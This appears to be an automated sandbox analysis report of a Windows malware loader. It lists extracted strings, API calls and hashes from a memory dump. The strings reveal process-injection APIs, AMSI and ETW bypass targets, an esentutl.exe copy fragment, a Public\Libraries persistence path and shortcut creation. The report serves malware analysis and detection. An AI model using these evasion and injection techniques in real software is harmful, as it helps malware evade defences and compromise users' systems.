Initialize, xrefs: 02B2F8FE, 02B3081C, 02B309B0, 02B30B4E, 02B30CF4, 02B30FA9, 02B3164C, 02B31A88, 02B31F32, 02B3203C, 02B32723, 02B32A55, 02B32D75, 02B330A9, 02B33257, 02B33583, 02B3393C, 02B35876, 02B35C0B, 02B36007, 02B361CC, 02B36438, 02B3656E, 02B36773, 02B376E8, 02B383A0, 02B393AD, 02B39FBD, 02B3A35B, 02B3A88A, 02B3AC44, 02B3B190
Kernel32, xrefs: 02B3AA02, 02B3AA11, 02B3AA4D
ntdll, xrefs: 02B3922B, 02B3927B, 02B3928F, 02B3A628, 02B3A65B, 02B3A68E, 02B3A6C1, 02B3A6F4, 02B3AE95, 02B3AEC8, 02B3AEFB, 02B3AF2E, 02B3AF61, 02B3AF94, 02B3AFC7, 02B3AFFA, 02B3B02D, 02B3B060, 02B3B093, 02B3B0C6, 02B3B0F9, 02B3B12C, 02B3B15F
EnumServicesStatusExW, xrefs: 02B3A9DF
SLGetGenuineInformation, xrefs: 02B39E6F
RtlAllocateHeap, xrefs: 02B3A644, 02B3A6AA
WintrustAddActionID, xrefs: 02B2FC36
Advapi, xrefs: 02B3A9B7, 02B3A9C6, 02B3A9D5, 02B3A9E4, 02B3AA20, 02B3AA2F, 02B3AA3E
DllRegisterServer, xrefs: 02B2FB54, 02B300A0
can, xrefs: 02B33D15
smartscreenps, xrefs: 02B30051, 02B30084, 02B300B7
DlpCheckIsCloudSyncApp, xrefs: 02B3A480
NtQueryVirtualMemory, xrefs: 02B3AEB1
kernel32, xrefs: 02B3AAF0, 02B3AB23, 02B3AB56, 02B3AB89, 02B3ABBC, 02B3ABEF, 02B3AC22
EnumServicesStatusExA, xrefs: 02B3A9D0
NtWaitForSingleObject, xrefs: 02B3A677
CreateProcessW, xrefs: 02B3AA0C
[InternetShortcut], xrefs: 02B36D48
NtQuerySecurityObject, xrefs: 02B3AFE3
dbgcore, xrefs: 02B39253, 02B39267
MZP, xrefs: 02B39992
CryptSIPVerifyIndirectData, xrefs: 02B2FDC7, 02B3A17B
tquery, xrefs: 02B3A0C6
NtCreateSection, xrefs: 02B3AF4A
RtlQueryProcessDebugInformation, xrefs: 02B3A9A3
CryptSIPGetSignedDataMsg, xrefs: 02B2FDFA
NtAccessCheck, xrefs: 02B3B016
CreateProcessA, xrefs: 02B3A9FD
BCryptVerifySignature, xrefs: 02B2FEA9, 02B3A2A6
sppwmi, xrefs: 02B3ADFC
bcrypt, xrefs: 02B2FEC0, 02B2FEF3, 02B2FF26, 02B3A2BD
EnumServicesStatusW, xrefs: 02B3A9C1
NtOpenFile, xrefs: 02B3B0E2
GET, xrefs: 02B32455
DllGetClassObject, xrefs: 02B2FB03, 02B3003A, 02B3A115, 02B3ADE5
sppc, xrefs: 02B39E86, 02B39EB9, 02B39EEC, 02B39F1F, 02B3AE2F, 02B3AE62
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 02B3098A
advapi32, xrefs: 02B3923F
GetProxyDllInfo, xrefs: 02B2FB2A
DlpGetArchiveFileTraceInfo, xrefs: 02B3A4B3
NtQueryInformationThread, xrefs: 02B3AEE4
GZmMS1j, xrefs: 02B2F80F
EnumProcessModules, xrefs: 02B3A9EE
EtwEventWrite, xrefs: 02B3B148
NtOpenProcess, xrefs: 02B3928A
NtOpenObjectAuditAlarm, xrefs: 02B39226
DllGetActivationFactory, xrefs: 02B3006D
NtQueryDirectoryFile, xrefs: 02B3A994
URL=file:", xrefs: 02B36D57
IconIndex=, xrefs: 02B36DAD
NtOpenSection, xrefs: 02B3AF17
C:\Windows\System32\, xrefs: 02B3040A, 02B3796B, 02B386B3
OpenSession, xrefs: 02B2F89A, 02B2FA2A, 02B30312, 02B30433, 02B30540, 02B30658, 02B30A2C, 02B30BCA, 02B30D70, 02B30E90, 02B31025, 02B3111D, 02B3130A, 02B314B0, 02B317DE, 02B31A0C, 02B31B80, 02B31CA3, 02B31E21, 02B321C7, 02B3224A, 02B32362, 02B3247A, 02B32586, 02B327A4, 02B328C1, 02B32B60, 02B32BDC, 02B32DF1, 02B32F91, 02B332D3, 02B33461, 02B3367B, 02B33795, 02B33B36, 02B35634, 02B357CE, 02B3596E, 02B35B13, 02B35C87, 02B35ED7, 02B35F8B, 02B36248, 02B36340, 02B367EF, 02B36AC9, 02B36C3D, 02B36DD3, 02B36F83, 02B3766C, 02B37871, 02B37A8A, 02B37B2D, 02B37CC0, 02B38088, 02B38324, 02B38621, 02B3877A, 02B38920, 02B38AAD, 02B38C41, 02B38DC0, 02B38EC3, 02B39037, 02B392B5, 02B394A5, 02B39796, 02B3991C, 02B39B77, 02B39D7D, 02B39F41, 02B3A230, 02B3A2DF, 02B3A51F, 02B3A716, 02B3A80E, 02B3ACC0, 02B3B288
NtMapViewOfSection, xrefs: 02B3AF7D
/o, xrefs: 02B364C0
BCryptQueryProviderRegistration, xrefs: 02B2FEDC
GetProcessMemoryInfo, xrefs: 02B3A148
NtAlertResumeThread, xrefs: 02B3A611
UacUninitialize, xrefs: 02B33844, 02B33BB2
C:\\Users\\Public\\Libraries\\, xrefs: 02B3616F
DlpGetWebSiteAccess, xrefs: 02B3A4E6
OpenProcess, xrefs: 02B3AB72
VirtualProtect, xrefs: 02B3AB3F
UacScan, xrefs: 02B2F836, 02B300D9, 02B301D1, 02B307A0, 02B31386, 02B31964, 02B322C6, 02B329D9, 02B33C2E, 02B35B8F, 02B360FF, 02B362C4, 02B365EA, 02B366F7, 02B36955, 02B36A4D, 02B375F0, 02B37992, 02B37BA9, 02B37D3C, 02B37F90, 02B3841C, 02B385A5, 02B386FE, 02B388A4, 02B38A31, 02B38BC5, 02B38D44, 02B38FBB, 02B39429, 02B39643, 02B39824, 02B399BD, 02B39BF3, 02B3AA63
.url, xrefs: 02B35D93
ieproxy, xrefs: 02B2FB14, 02B2FB3B, 02B2FB6B
ScanBuffer, xrefs: 02B2F9C6, 02B2FD1E, 02B2FF48, 02B304AF, 02B305BC, 02B306D4, 02B30AA8, 02B30C46, 02B30DEC, 02B30F0C, 02B310A1, 02B31199, 02B31402, 02B315A8, 02B31744, 02B3185A, 02B318E8, 02B31BFC, 02B31E9D, 02B31FAE, 02B3214B, 02B324F6, 02B32602, 02B32820, 02B3293D, 02B32C58, 02B32CF9, 02B32E6D, 02B3302D, 02B3334F, 02B33719, 02B339B8, 02B33ABA, 02B356B0, 02B359EA, 02B35D03, 02B36083, 02B363BC, 02B36666, 02B3686B, 02B369D1, 02B36B45, 02B36BC1, 02B37764, 02B377F5, 02B37C25, 02B37DB8, 02B37F14, 02B3800C, 02B38529, 02B387F6, 02B3899C, 02B38B29, 02B38CBD, 02B38E3C, 02B390B3, 02B391AB, 02B395C7, 02B398A0, 02B39A39, 02B39C6F, 02B39D01, 02B3A039, 02B3A3D7, 02B3A906, 02B3B20C
TrustOpenStores, xrefs: 02B2FC03
SxTracerGetThreadContextDebug, xrefs: 02B3A0E2, 02B3ADB2
CreateProcessWithLogonW, xrefs: 02B3AA39
SLGatherMigrationBlob, xrefs: 02B3AE18
I_QueryTagInformation, xrefs: 02B3923A
FlushInstructionCache, xrefs: 02B3ABD8
VirtualAlloc, xrefs: 02B3AAD9
SLLoadApplicationPolicies, xrefs: 02B39F08
WriteVirtualMemory, xrefs: 02B3ABA5
SLIsGenuineLocalEx, xrefs: 02B39ED5
BCryptRegisterProvider, xrefs: 02B2FF0F
SLGetSLIDList, xrefs: 02B39EA2
LdrLoadDll, xrefs: 02B3B049
http, xrefs: 02B32128
psapi, xrefs: 02B3A15F
NtDeviceIoControlFile, xrefs: 02B3A985
MiniDumpWriteDump, xrefs: 02B3924E
mssip32, xrefs: 02B2FDAB, 02B2FDDE, 02B2FE11, 02B3A192
CreateProcessAsUserW, xrefs: 02B3AA2A, 02B3AA48
ScanString, xrefs: 02B2F962, 02B2FB8D, 02B2FCA2, 02B2FE33, 02B2FFC4, 02B3024D, 02B3038E, 02B30914, 02B3152C, 02B316C8, 02B31B04, 02B31D1F, 02B31D9B, 02B320B8, 02B323DE, 02B326A7, 02B32AE4, 02B32F15, 02B33125, 02B331DB, 02B334DD, 02B335FF, 02B338C0, 02B355B8, 02B35752, 02B35A97, 02B35E5B, 02B364F2, 02B36CD8, 02B36E4F, 02B36F07, 02B37574, 02B37A0E, 02B37E75, 02B38498, 02B38F3F, 02B39331, 02B3971A, 02B39AFB, 02B39DF9, 02B3A1B4, 02B3A59B, 02B3A792, 02B3AD3C
RtlCreateQueryDebugBuffer, xrefs: 02B3A6DD
acS, xrefs: 02B33D02
NtSetSecurityObject, xrefs: 02B39276
CreateProcessAsUserA, xrefs: 02B3AA1B
FindCertsByIssuer, xrefs: 02B2FC69
WinHttp.WinHttpRequest.5.1, xrefs: 02B3233C
DlpNotifyPreDragDrop, xrefs: 02B3A44D
RetailTracerEnable, xrefs: 02B3A0AF
LdrGetProcedureAddress, xrefs: 02B3B07C
wintrust, xrefs: 02B2FC1A, 02B2FC4D, 02B2FC80
CryptSIPGetInfo, xrefs: 02B2FD94
endpointdlp, xrefs: 02B3A464, 02B3A497, 02B3A4CA, 02B3A4FD
NtGetWriteWatch, xrefs: 02B3AE7E
MiniDumpReadDumpStream, xrefs: 02B39262
VirtualAllocEx, xrefs: 02B3AB0C
HotKey=, xrefs: 02B36EE1
C:\Users\Public\, xrefs: 02B35D88, 02B36FF3
psapi, xrefs: 02B3A9F3
C:\\Windows\\System32\\esentutl.exe /y , xrefs: 02B364AA
EnumServicesStatusA, xrefs: 02B3A9B2
NtQuerySystemInformation, xrefs: 02B3A976
NtWriteVirtualMemory, xrefs: 02B3B0AF
/d , xrefs: 02B364B5
Ntdll, xrefs: 02B3A97B, 02B3A98A, 02B3A999, 02B3A9A8
EtwEventWriteEx, xrefs: 02B3B115
SetUnhandledExceptionFilter, xrefs: 02B3AC0B
UacInitialize, xrefs: 02B2FA8E, 02B30155, 02B30898, 02B3553C, 02B358F2, 02B35DDF, 02B378ED, 02B3912F, 02B3954B
spp, xrefs: 02B3A0F9, 02B3A12C, 02B3ADC9
NtReadVirtualMemory, xrefs: 02B3AFB0
SLGetEncryptedPIDEx, xrefs: 02B3AE4B

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
API String ID: 297057983-2644593349
Opcode ID: a17eed07ffbcc5f27070012b1c678ae930f3691f0b74f4ef17f4a13818689182
Instruction ID: b55d02beae2f92b8f966ebe61073465c5925099330f520550f308a12bacbcafb
Opcode Fuzzy Hash: a17eed07ffbcc5f27070012b1c678ae930f3691f0b74f4ef17f4a13818689182
Instruction Fuzzy Hash: 2714E875A0012C9FDB11EB64DD80ACE73BAFF85304FA041E6E549EB218DA30AE95DF51

Function 02B38128 Relevance: 162.0, APIs: 5, Strings: 86, Instructions: 2778
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B289D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,74AD0000,00000000,00000000), ref: 02B28AAA

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02C8B7E0,02C8B824,OpenSession,02B97380,02B3B7B8,UacScan,02B97380), ref: 02B386E9
ResumeThread.KERNEL32(00000000,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8), ref: 02B38D33
CloseHandle.KERNEL32(00000000,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,00000000,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380), ref: 02B38EB2

Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6

CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02B97380,02B3B7B8,UacInitialize,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380), ref: 02B392A4

Part of subcall function 02B17E5C: GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67

Part of subcall function 02B2DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DD5E), ref: 02B2DCCB
Part of subcall function 02B2DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B2DD05
Part of subcall function 02B2DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B2DD32
Part of subcall function 02B2DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B2DD3B

Part of subcall function 02B28338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B283C2), ref: 02B283A4

ExitProcess.KERNEL32(00000000,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,Initialize,02B97380,02B3B7B8,00000000,00000000,00000000,ScanString,02B97380,02B3B7B8), ref: 02B3B2FA

Strings

NtOpenSection, xrefs: 02B3AF17
C:\Windows\System32\, xrefs: 02B386B3
Initialize, xrefs: 02B381B0, 02B383A0, 02B393AD, 02B39FBD, 02B3A35B, 02B3A88A, 02B3AC44, 02B3B190
OpenSession, xrefs: 02B38134, 02B382A8, 02B38324, 02B38621, 02B3877A, 02B38920, 02B38AAD, 02B38C41, 02B38DC0, 02B38EC3, 02B39037, 02B392B5, 02B394A5, 02B39796, 02B3991C, 02B39B77, 02B39D7D, 02B39F41, 02B3A230, 02B3A2DF, 02B3A51F, 02B3A716, 02B3A80E, 02B3ACC0, 02B3B288
NtMapViewOfSection, xrefs: 02B3AF7D
Kernel32, xrefs: 02B3AA02, 02B3AA11, 02B3AA4D
ntdll, xrefs: 02B3922B, 02B3927B, 02B3928F, 02B3A628, 02B3A65B, 02B3A68E, 02B3A6C1, 02B3A6F4, 02B3AE95, 02B3AEC8, 02B3AEFB, 02B3AF2E, 02B3AF61, 02B3AF94, 02B3AFC7, 02B3AFFA, 02B3B02D, 02B3B060, 02B3B093, 02B3B0C6, 02B3B0F9, 02B3B12C, 02B3B15F
GetProcessMemoryInfo, xrefs: 02B3A148
NtAlertResumeThread, xrefs: 02B3A611
EnumServicesStatusExW, xrefs: 02B3A9DF
DlpGetWebSiteAccess, xrefs: 02B3A4E6
SLGetGenuineInformation, xrefs: 02B39E6F
RtlAllocateHeap, xrefs: 02B3A644, 02B3A6AA
OpenProcess, xrefs: 02B3AB72
Advapi, xrefs: 02B3A9B7, 02B3A9C6, 02B3A9D5, 02B3A9E4, 02B3AA20, 02B3AA2F, 02B3AA3E
VirtualProtect, xrefs: 02B3AB3F
UacScan, xrefs: 02B3841C, 02B385A5, 02B386FE, 02B388A4, 02B38A31, 02B38BC5, 02B38D44, 02B38FBB, 02B39429, 02B39643, 02B39824, 02B399BD, 02B39BF3, 02B3AA63
DlpCheckIsCloudSyncApp, xrefs: 02B3A480
ScanBuffer, xrefs: 02B38529, 02B387F6, 02B3899C, 02B38B29, 02B38CBD, 02B38E3C, 02B390B3, 02B391AB, 02B395C7, 02B398A0, 02B39A39, 02B39C6F, 02B39D01, 02B3A039, 02B3A3D7, 02B3A906, 02B3B20C
NtQueryVirtualMemory, xrefs: 02B3AEB1
kernel32, xrefs: 02B3AAF0, 02B3AB23, 02B3AB56, 02B3AB89, 02B3ABBC, 02B3ABEF, 02B3AC22
EnumServicesStatusExA, xrefs: 02B3A9D0
NtWaitForSingleObject, xrefs: 02B3A677
SxTracerGetThreadContextDebug, xrefs: 02B3A0E2, 02B3ADB2
CreateProcessWithLogonW, xrefs: 02B3AA39
CreateProcessW, xrefs: 02B3AA0C
SLGatherMigrationBlob, xrefs: 02B3AE18
I_QueryTagInformation, xrefs: 02B3923A
FlushInstructionCache, xrefs: 02B3ABD8
VirtualAlloc, xrefs: 02B3AAD9
SLLoadApplicationPolicies, xrefs: 02B39F08
WriteVirtualMemory, xrefs: 02B3ABA5
NtQuerySecurityObject, xrefs: 02B3AFE3
SLIsGenuineLocalEx, xrefs: 02B39ED5
dbgcore, xrefs: 02B39253, 02B39267
SLGetSLIDList, xrefs: 02B39EA2
MZP, xrefs: 02B39992
LdrLoadDll, xrefs: 02B3B049
psapi, xrefs: 02B3A15F
CryptSIPVerifyIndirectData, xrefs: 02B3A17B
NtDeviceIoControlFile, xrefs: 02B3A985
MiniDumpWriteDump, xrefs: 02B3924E
mssip32, xrefs: 02B3A192
ScanString, xrefs: 02B3822C, 02B38498, 02B38F3F, 02B39331, 02B3971A, 02B39AFB, 02B39DF9, 02B3A1B4, 02B3A59B, 02B3A792, 02B3AD3C
CreateProcessAsUserW, xrefs: 02B3AA2A, 02B3AA48
RtlCreateQueryDebugBuffer, xrefs: 02B3A6DD
tquery, xrefs: 02B3A0C6
NtCreateSection, xrefs: 02B3AF4A
RtlQueryProcessDebugInformation, xrefs: 02B3A9A3
NtAccessCheck, xrefs: 02B3B016
CreateProcessA, xrefs: 02B3A9FD
BCryptVerifySignature, xrefs: 02B3A2A6
NtSetSecurityObject, xrefs: 02B39276
CreateProcessAsUserA, xrefs: 02B3AA1B
DlpNotifyPreDragDrop, xrefs: 02B3A44D
RetailTracerEnable, xrefs: 02B3A0AF
sppwmi, xrefs: 02B3ADFC
bcrypt, xrefs: 02B3A2BD
EnumServicesStatusW, xrefs: 02B3A9C1
LdrGetProcedureAddress, xrefs: 02B3B07C
NtOpenFile, xrefs: 02B3B0E2
DllGetClassObject, xrefs: 02B3A115, 02B3ADE5
endpointdlp, xrefs: 02B3A464, 02B3A497, 02B3A4CA, 02B3A4FD
sppc, xrefs: 02B39E86, 02B39EB9, 02B39EEC, 02B39F1F, 02B3AE2F, 02B3AE62
NtGetWriteWatch, xrefs: 02B3AE7E
MiniDumpReadDumpStream, xrefs: 02B39262
advapi32, xrefs: 02B3923F
DlpGetArchiveFileTraceInfo, xrefs: 02B3A4B3
VirtualAllocEx, xrefs: 02B3AB0C
NtQueryInformationThread, xrefs: 02B3AEE4
psapi, xrefs: 02B3A9F3
EnumServicesStatusA, xrefs: 02B3A9B2
NtQuerySystemInformation, xrefs: 02B3A976
NtWriteVirtualMemory, xrefs: 02B3B0AF
EnumProcessModules, xrefs: 02B3A9EE
EtwEventWrite, xrefs: 02B3B148
Ntdll, xrefs: 02B3A97B, 02B3A98A, 02B3A999, 02B3A9A8
EtwEventWriteEx, xrefs: 02B3B115
SetUnhandledExceptionFilter, xrefs: 02B3AC0B
UacInitialize, xrefs: 02B3912F, 02B3954B
NtOpenProcess, xrefs: 02B3928A
NtOpenObjectAuditAlarm, xrefs: 02B39226
spp, xrefs: 02B3A0F9, 02B3A12C, 02B3ADC9
NtReadVirtualMemory, xrefs: 02B3AFB0
NtQueryDirectoryFile, xrefs: 02B3A994
SLGetEncryptedPIDEx, xrefs: 02B3AE4B

Memory Dump Source

Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true

Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_x.jbxd

Similarity

API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
API String ID: 2769005614-3738268246
Opcode ID: 04328828d6d82fd6c1147251dd6a065ad74ed4474d361b36479348b3b70a6c25
Instruction ID: 3b474daacc5860f6207b0732d1cef65210261a39ded1c710ba4e0d4c46b18a38
Opcode Fuzzy Hash: 04328828d6d82fd6c1147251dd6a065ad74ed4474d361b36479348b3b70a6c25
Instruction Fuzzy Hash: 8C43FA79A0422CDFDB11EB64DD809CE73BAFF85344FA041E5E109EB218DA30AE959F51

Function 02B33E12 Relevance: 41.8, APIs: 3, Strings: 23, Instructions: 2804sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 02B289D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,74AD0000,00000000,00000000), ref: 02B28AAA

Part of subcall function 02B2DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DD5E), ref: 02B2DCCB
Part of subcall function 02B2DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B2DD05
Part of subcall function 02B2DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B2DD32
Part of subcall function 02B2DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B2DD3B

Sleep.KERNEL32(000003E8,ScanBuffer,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,02B3BB30,00000000,00000000,02B3BB24,00000000,00000000), ref: 02B340CB

Part of subcall function 02B288B8: LoadLibraryW.KERNEL32(amsi), ref: 02B288C1
Part of subcall function 02B288B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B28920

Sleep.KERNEL32(000003E8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,000003E8,ScanBuffer,02B97380,02B3B7B8,UacScan,02B97380), ref: 02B34277

Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6

Sleep.KERNEL32(00004E20,UacScan,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacInitialize,02B97380,02B3B7B8), ref: 02B350EE

Part of subcall function 02B2DC04: RtlI.N(?,?,00000000,02B2DC7E), ref: 02B2DC2C
Part of subcall function 02B2DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC42
Part of subcall function 02B2DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC61

Part of subcall function 02B17E5C: GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67

Part of subcall function 02B285BC: WinExec.KERNEL32(?,?), ref: 02B28624

Strings

Initialize, xrefs: 02B35876, 02B35C0B, 02B36007, 02B361CC, 02B36438, 02B3656E, 02B36773
